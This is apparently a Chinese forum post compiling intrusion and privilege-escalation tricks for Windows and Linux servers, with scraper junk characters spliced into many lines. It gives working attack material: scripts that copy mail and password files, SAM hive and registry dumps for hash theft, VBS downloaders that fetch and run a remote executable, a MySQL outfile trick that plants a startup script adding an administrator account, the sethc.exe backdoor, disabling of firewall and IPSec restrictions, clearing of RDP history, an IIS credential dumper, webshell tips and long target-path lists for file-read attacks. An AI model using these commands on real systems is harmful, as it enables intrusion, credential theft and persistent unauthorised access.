若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
0 g& o3 ]) j) _' \' y! S* k& U}  
0 X0 X9 F- R6 V, Z! [1 z
, l( h( f; Y3 {( j! M提权先执行systeminfo
1 V6 r8 \: L. K4 r6 s' k8 Vtoken 漏洞补丁号 KB956572
Churrasco          kb952004
命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
/ q. d4 L+ E; R, S9 _" x- T# }$ n$ y——————————————
3 G0 p7 ?& \) w$ D; t2、收集系统信息的脚本  
3 x; L  Z- I8 K) t* L5 \for window：
+ k1 x, k8 G/ c
@echo off
echo #########system info collection
1 o/ q6 B' M2 F! V9 rsysteminfo
& t3 ?4 ?, W9 V+ ^; y2 Y' lver
hostname
% }& |6 A/ e% L: b( ]! w2 Snet user
. R- c  t* t9 vnet localgroup
$ L  B4 w0 N  Z* F" W8 Z/ p  |net localgroup administrators
net user guest
# p% m" J5 n: M5 H$ A" xnet user administrator
# F0 B9 P9 S3 R) \4 @" H- W' `- Y
% [' K# d! C  D3 Fecho #######at- with   atq#####
  ^" s. P5 s4 g6 a$ E' Eecho schtask /query
# c6 A+ W3 N) ~. `, q' V% c
echo
echo ####task-list#############
' C% z0 P0 M1 ]tasklist /svc
echo
echo ####net-work infomation
4 G! ?; u$ ?7 M% G3 V" Nipconfig/all
( z* g" I6 y2 d. t, }route print
arp -a
5 y; i3 Z6 g5 S9 e. {netstat -anipconfig /displaydns
echo
& t% T# G) U& A$ {$ _echo #######service############
1 K- a$ I* p/ g+ J2 c$ i! Bsc query type= service state= all
echo #######file-##############
- Z/ d& e+ I# f! I  L0 t4 _2 |cd \
tree -F
for linux：

" Z1 h6 L& ~8 p* Y+ v% f* ^# x# Y#!/bin/bash
& I3 @& q! H. u: |+ F$ S% U' y2 t2 f
echo #######geting sysinfo####
& m& a1 \( j9 X' V* I' `echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
cat /proc/meminfo
echo
3 n0 B/ U5 C. C- t: t! N0 C& R7 q, Hcat /proc/cpuinfo
1 p$ E; b( t2 G8 f7 Kecho
3 E  d$ M7 o7 frpm -qa 2>/dev/null
" s% D* J. u5 L######stole the mail......######
) u' W. j5 W' N+ |0 \$ ~  kcp -a /var/mail /tmp/getmail 2>/dev/null

) h8 Z( V; w8 T
( j( c( ]1 W! a, L9 Aecho 'u'r id is' `id`
% E5 @+ j7 c( b6 X; Y# O2 becho ###atq&crontab#####
+ f1 |+ J% o' y8 K  e( U* U# t  natq
crontab -l
# @% h! ~7 I7 L9 ?- M! D% gecho #####about var#####
set

0 B. \) h0 _$ h( c3 qecho #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
/ d% y5 ]) k1 z3 b) V' a7 zcat /etc/hosts
( ^- @) F" @% P' S6 w0 N  yhostname
% q& p. l0 w, s$ ]ipconfig -a
arp -v
9 J) q# K1 r1 Z, Fecho ########user####
cat /etc/passwd|grep -i sh

' N. W* @$ B/ c# L+ W! jecho ######service####
chkconfig --list
$ {( R7 u2 n5 ^* N
' e( t9 }9 F7 w' V/ Gfor i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done
. B( D- O7 f! y4 H
locate passwd >/tmp/password 2>/dev/null
sleep 5
, o9 `2 ]/ K( {' E$ B+ G- o. ilocate password >>/tmp/password 2>/dev/null
* t! A! f/ ~+ P+ i! w; _* jsleep 5
2 N2 z7 C3 f5 F8 w* O0 I7 mlocate conf >/tmp/sysconfig 2>dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5

###maybe can use "tree /"###
* B8 i5 F2 K& }! k7 jecho ##packing up#########
5 S6 N$ P6 n( J* ytar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
# y. }" T: ~. B——————————————
  {3 Y; R6 n3 v3、ethash 不免杀怎么获取本机hash。
' p( M- J% Z1 i首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
% r- Y! F- y# w9 F9 c接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
, R) G( W8 Y$ J! Ghash 抓完了记得把自己的账户密码改过来哦！
  W- Y" _  _$ ?( V4 [8 a据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
5 W: W  ]( M/ ^8 I4 g2 g——————————————
4、vbs 下载者
' O8 c  H" a" F1
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
& W& H, h+ @: {+ W/ Qecho sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
  H( h6 O% H+ s/ Wecho sGet.Open() >>c:\windows\cftmon.vbs
1 H4 g: D4 P. _& P5 W4 T* \2 Necho sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
, s+ J* n" V# {" `: M8 {+ Zecho sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
% T1 G% B4 s, K( |, Z; ^echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
1 L; d3 g( d& p/ R2 B9 Eecho objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs

7 Q8 h' k- e5 v$ A2 k2
On Error Resume Nextim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
1 f) |; z3 ]+ `! os1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
. M; a6 R3 J; g3 A* \+ ]' W  qsGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
3 h0 z# d+ Y) {
* E2 k3 a- J" d! `& j当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
——————————————————
5、
: |/ J% Z5 `8 r7 L* z1.查询终端端口
  J( j/ T( G9 p/ l6 y+ U$ [5 o; rREG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
9 |8 ~) B3 M/ h* C1 A3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
8 c6 s0 F, a% E! fREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
5 r1 P. r$ w* Y, M4 d+ TREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
————————————————
6、create table a (cmd text);
9 \- ~& o# h% j1 w8 pinsert into a values ("set wshshell=createobject (""wscript.shell"")");
* a3 @2 b! ]% zinsert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
6 X6 i) n/ H( Z+ }insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
————————————————————
7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
8 x: W* C" ~; ~  ]0 {_____
8、for /d %i in (d:\freehost\*) do @echo %i

列出d的所有目录
  
  for /d %i in (???) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的打出来

8 S1 q6 G) s' c7 i2.for /r %i in (*.exe) do @echo %i
  
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

2 A) D9 {; b7 Gfor /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i
- x2 M3 Z  j- c2 r
* [; B( [0 [" u& ~. I  ?" g3.for /f %i in (c:\1.txt) do echo %i
  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中

8 i$ R. t* E6 \/ t% e: z6 u4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i
. J4 R$ O; T# N3 V5 E
* q- N" L: P  D! p, k4 J9 Y  delims=后的空格是分隔符 tokens是取第几个位置
5 H* h, X2 a, r5 l. W8 C6 ~——————————
●注册表:
! |  E0 X2 J4 W: p1.Administrator注册表备份:
9 _3 b: A8 ~' r) o8 n# J8 sreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

, u1 j" M% G5 ~3 U2.修改3389的默认端口:
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
1 L/ h! l8 i( D( _修改PortNumber.
( b9 S) l3 l# Q5 T& Q
3.清除3389登录记录:
reg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f
, x. O: s$ I: y/ P- a0 n
$ c4 T  y% E: }+ W4.Radmin密码:
reg export HKLM\SYSTEM\RAdmin c:\a.reg
1 U' E* o+ P+ q' C$ r# ~9 {
5.禁用TCP/IP端口筛选(需重启):
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
. @' x! `( l) w: y
0 n. x0 `" H( @$ l6.IPSec默认免除项88端口(需重启):
reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
7 z$ y8 z1 ^& }! h+ z7 x& h或者
netsh ipsec dynamic set config ipsecexempt value=0

7.停止指派策略"myipsec":
7 j4 b7 L" A. l& y; p, rnetsh ipsec static set policy name="myipsec" assign=n

8.系统口令恢复LM加密:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
/ }# ]! q* O" r
9.另类方法抓系统密码HASH
4 ~7 M4 y; f5 v3 T) J5 hreg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
% Z) i6 K+ v( Vreg save hklm\security c:\security.hive

6 ~4 i1 L0 {" r10.shift映像劫持
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
) {! z5 }6 }: r6 Q( z
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
-----------------------------------
星外vbs(注：测试通过，好东西）
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
+ F5 E* t& }7 E+ k. oFor Each obj3w In objservice
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
. h* k% A. X/ k8 H+ F! X; `, a/ tif IsNumeric(childObjectName)=true then
+ n2 Z2 J  s, @' [: ?/ Fset IIs=objservice.GetObject("IIsWebServer",childObjectName)
if err.number<>0 then
exit for
msgbox("error!")
0 Z7 M0 ^5 l+ X7 _6 I# q) a0 ^wscript.quit
end if
serverbindings=IIS.serverBindings
5 r% C) o0 Q' a6 WServerComment=iis.servercomment
. b0 c9 b- x1 \, f2 c- A& Kset IISweb=iis.getobject("IIsWebVirtualDir","Root")
. i9 G4 v* Q5 L: L% Juser=iisweb.AnonymousUserName
0 A: x" [* @- M  ]7 [pass=iisweb.AnonymousUserPass
path=IIsWeb.path
" J2 a; G, m! ?  d4 P9 e5 alist=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
end if
/ Q) T4 |$ d" O' SNext
0 F- i0 p7 n& g; o) f# vwscript.echo list
1 S) x# J" J4 v0 B$ m* oSet ObjService=Nothing
4 m5 y8 |" d' gwscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
WScript.Quit
+ c- A* [- A6 h  F9 A, w复制代码
1 G# s7 O1 z8 e# b+ E----------------------2011新气象，欢迎各位补充、指正、优化。----------------
. I' X6 j- K! i8 s5 U3 o8 R! f1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
将folder.htt文件，加入以下代码：
<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
</OBJECT>
复制代码
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
PS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
! v9 e* {9 u. ^8 @2 tasp代码，利用的时候会出现登录问题
原因是ASP大马里有这样的代码：（没有就没事儿了）
url=request.severvariables("url")
这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
- Q) o5 b- e! s+ A, _ url=request.severvariables("path_info")
path_info可以直接呈现虚拟路径 顺利解析gif大马

==============================================================
- `; M3 s' N. b; \7 jLINUX常见路径：
  e7 e2 w- \  w8 }1 w; Y; D( s7 |
: W# N9 J" E: |/etc/passwd
/etc/shadow
- O! X6 X3 E) Z8 @8 M$ D' k/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
# f( S4 e, G' q7 n! |7 }8 b5 V/var/www/htdocs/index.php
/var/www/conf/httpd.conf
- J4 n, J, r& y) v/var/www/htdocs/index.html
/var/httpd/conf/php.ini
, p$ y$ U( r1 ?: d( I/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
) \- ^% T2 m" m/var/httpd/conf/php.ini
% A! [  t+ A: \/var/www/index.html
. y+ m1 X  z; {# r: C* c/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
0 q% q" ~* n8 m+ Y* n/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
2 N7 A7 l- ~, o$ I/usr/local/httpd2.2/htdocs/index.php
6 Q! j; d; |( p/usr/local/httpd2.2/htdocs/index.html
. L. y+ I) J1 P  b& r4 r1 B- S/tmp/apache/htdocs/index.html
3 c3 S5 R5 [" K. w/ X/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
9 w3 ~( \% Y- ]  M# S# Y/etc/httpd/conf/httpd.conf
- ]: S: n) J2 ^/etc/httpd/htdocs/index.html
/www/php/php.ini
, m" j  s6 \7 z1 H0 j  y# |/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
4 _7 i' n% F$ }/www/htdocs/index.php
3 R5 a% R8 N4 V2 I/www/htdocs/index.html
" n/ H1 v6 V5 ^' v0 J8 ~- }/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
- ^- s- w. y( c8 z/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
; y2 b4 Z7 l9 F. b+ M2 Y8 W/etc/apache2/apache.conf
& {2 Z: t( w6 p/etc/apache/httpd.conf
/etc/apache2/httpd.conf
* |1 ]5 g/ f  U" h% E9 Z& M/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
3 r+ R( A# @; a% q4 S! N& v' Z/etc/httpd/conf.d/php.conf
; Q( N, B8 |9 u) _  J, m8 x+ o/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
, m, c) ]$ N* T. n6 n+ a8 ]& D1 x/etc/httpd/logs/error.log
: q: q9 W! }- Q/ F0 S3 p! a! r* i/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
1 s0 @- E4 v0 L6 x0 V& R/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
# T9 u  U2 `3 _: J# d$ z/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/ W* e' u4 U. X1 ?% d9 L/var/log/apache2/error.log
/var/log/apache2/access_log
& F0 Z8 L( Y$ _% t$ g! Q4 ~/var/log/apache2/access.log
% p" G4 k, D" ?; W& ]8 W/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
, R. O0 ~1 Z& q* g/usr/local/apache/logs/error_log
/ E: d! a, K$ ~3 L! a4 F/usr/local/apache/logs/error.log
# O- O+ E5 G4 C+ [7 Z/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
; B2 n& `3 c8 L. e$ B0 F* X( Z/var/log/error.log
5 T7 _8 z- O3 R' p/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
/bin/php.ini
1 r, x' B% l  ^* R7 x/etc/init.d/httpd
/etc/init.d/mysql
4 v1 O+ x7 E: D/etc/httpd/php.ini
/ \/ a2 f  `; ]0 z+ a/ X. J/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
" g' t4 q0 Q& I) w/usr/local/php/lib/php.ini
* E$ I$ x# a5 q* p  [3 r/usr/local/php4/lib/php.ini
8 J* S( L- K& T/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
, k, b# f$ V1 b' C% o+ y/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
. x& M: F. ^, Q9 R/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
: ]# b+ c8 H5 L3 s( S; t7 m/usr/local/apache/conf/httpd.conf
7 \0 f& t, c0 z7 g# w  J/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
1 y+ Z; s* J9 }; l/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
! E/ m* M* w# e$ Q/etc/php5/apache/php.ini
% j0 k& @: ~; E7 ]0 d: d/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
* A3 _- H( \; l) T/etc/php/apache2/php.ini
8 U4 I' i& N# u/web/conf/php.ini
' h, g6 `' o+ z9 Y. R! E5 J7 C/usr/local/Zend/etc/php.ini
: `& M! w  \4 _! f, w/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
6 }; g. c/ P5 b. L2 X% i: X( t/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
; c) R. S7 R+ X' N/php4/php.ini
6 h  Y- x( [/ a7 d$ R% V/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
! M: T; l. x. q9 [# A/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
- k* p5 `- T6 z/ j2 |/ i" s/home2/bin/stable/apache/php.ini
, E9 @! \8 \0 y, r/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
+ L) S& k- P5 u* ?) d7 k+ Z/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
' m2 Y0 p9 N+ o( D4 Z/ o/etc/my.cnf
4 @- e+ p0 L4 O/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
5 c, G& Z, e9 J0 ?4 \2 R/usr/local/cpanel/logs/license_log
% [" D* w  w6 J: h4 l, s3 H0 p/usr/local/cpanel/logs/login_log
" o9 U3 q# ~! t# y% h: x! G/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
. ~) q& k' g7 v& h/usr/local/share/examples/php/php.ini
& Z& K8 Y* D; a5 y* Y/ c
% t! F# B9 `6 v4 `8 W  X2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）

c:\windows\php.ini
c:\boot.ini
, m3 q1 b  i: H1 d8 e, rc:\1.txt
c:\a.txt
  ^- ]( ?& f2 O$ w- _( [# X) Z6 M: S$ D8 Y
  x# R0 l9 M5 L1 l6 A% e/ |$ Dc:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
3 \" f0 ?' `/ J1 A5 `6 _& G2 _c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
1 h0 v% {. P( [c:\program files\CMailServer\WebMail\index.asp
9 {1 Y8 f2 Q3 F" h/ {$ ?C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
; F8 c+ b& N9 I# A: YC:\WINDOWS\7i24iislog4.exe
; H% L) x* I) l- {8 P* H& AC:\WINDOWS\7i24tool.exe
% g3 }$ J4 U% k; E8 _
c:\hzhost\databases\url.asp

# E& X* ^4 R' Y1 t" yc:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
3 K) @* n5 h; X0 b# N4 ^/ O
" R3 {! X, V$ T/ Y  ~C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
c:\web\index.html
; F' F$ e' H) Lc:\www\index.html
c:\WWWROOT\index.html
' N' Z! p. W& w0 rc:\website\index.html
c:\web\index.asp
2 p. s/ O8 f3 t, }c:\www\index.asp
% W9 w; B% a! w5 tc:\wwwsite\index.asp
' G- \* H* r$ i- `' x' }8 J0 Xc:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
c:\website\default.html
: r. F  S0 S: J4 C! E" J- Yc:\web\default.asp
7 C' T' s# z/ J2 b. R9 _3 a$ }5 H/ {. pc:\www\default.asp
c:\wwwsite\default.asp
, G6 ]8 `9 y# y* kc:\WWWROOT\default.asp
c:\web\default.php
  Q! N: W8 K# z2 n/ |2 E# y# qc:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
- R! t: \! F: F" ]7 rC:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
: c2 T3 h" n/ ^6 t# \c:\winnt\notepad.exe
8 Q# c! @7 E0 W* o6 B/ pC:\Program Files\Microsoft Office\OFFICE10\winword.exe
) a1 g% c6 ~2 U, A- gC:\Program Files\Microsoft Office\OFFICE11\winword.exe
1 J9 D# z9 W! C; D9 H' WC:\Program Files\Microsoft Office\OFFICE12\winword.exe
9 G3 e! P" \: X' aC:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
- `, A8 B7 a; R& l& T& YC:\Program Files\360\360Safe\360safe.exe
) j. w3 m- R4 ?9 \5 B1 R4 q/ C& B0 f5 EC:\Program Files\360Safe\360safe.exe
( M2 i" x$ i4 y& |C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
: m$ ]% v* S) Y7 x: Lc:\ravbin\store.ini
# B) g$ L+ b. C( Z, {" k! {c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
3 Z9 J9 [) s! _$ b4 {7 @: p: J8 FC:\Documents and Settings\All Users\Start Menu\desktop.ini
0 g! t# {+ W$ h5 S8 SC:\Documents and Settings\Administrator\My Documents\Default.rdp
* L/ N& e4 V5 B6 o3 ?0 Q  xC:\Documents and Settings\Administrator\Cookies\index.dat
8 c) F' t: J* `0 j0 DC:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
3 e' E9 _8 m) m: |4 h/ v* Z, [C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
+ d6 q1 \; e" a8 C% B4 T. s) H7 ^' X; PC:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
; h5 F. |, [7 s3 \# S  N9 F& jC:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
' |( J0 R3 D6 lC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
  r3 k' y- R. a; GC:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
4 m5 {+ }0 z, g/ ^) D7 J( q) LC:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
9 _% u. x! y( B$ E, z# PC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
; `' K" \3 Y; x  j- {# s/ X. Fc:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
( q0 ~9 c. B9 J3 `# jC:\Program Files\Oracle\oraconfig\Lpk.dll
. `# H# T/ N' h+ p8 RC:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
; e6 B6 L. \/ _6 WC:\WINDOWS\system32\inetsrv\MetaBase.xml
/ C4 {  G: v* P4 }, wC:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
5 d  [. N) h% f; H% k3 WC:\WINDOWS\system32\config\default.LOG
2 q- o1 ?7 [% S/ L+ i0 AC:\WINDOWS\system32\config\sam
* u- ~8 ~4 l4 C' A/ E9 `! k" N) J' VC:\WINDOWS\system32\config\system
9 D  \$ j0 k+ c: jc:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
. K* n- g. t' r. Q6 Qc:\tomcat6\tomcat6\bin\version.sh
* z. ^& x! m( N- z& A6 F) ~c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
5 O8 ?6 H, o; @1 w/ H$ `c:\program files\tomcat6\bin\version.sh
; S3 ~$ i8 h, O* m9 c% rC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
! H/ O+ m: k( p: l$ e, c( R1 }; |c:\Apache2\bin\Apache.exe
! {- u, u7 K( b; s, A2 _c:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
6 h  i# t6 k$ P; l3 p1 ]& L" S/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
$ `) V. M  i; N3 j9 m" K: Kc:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
' J  d" ?8 K5 v2 u+ F* Gc:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
. C8 r+ p- W% U# ]# Y  a4 Rc:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmal\Foxmail.exe
C:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
$ K* u# k; H1 Q8 y5 \( wC:\Program Files\tencent\Foxmal\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
% Y" J7 V3 V  X' W2 y4 |' A0 p7 ZC:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
  t+ {% s, V7 r1 Fc:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
  n6 ]/ A# m4 D5 w8 G7 B! jC:\Program Files\FlashFXP\FlashFXP.ini
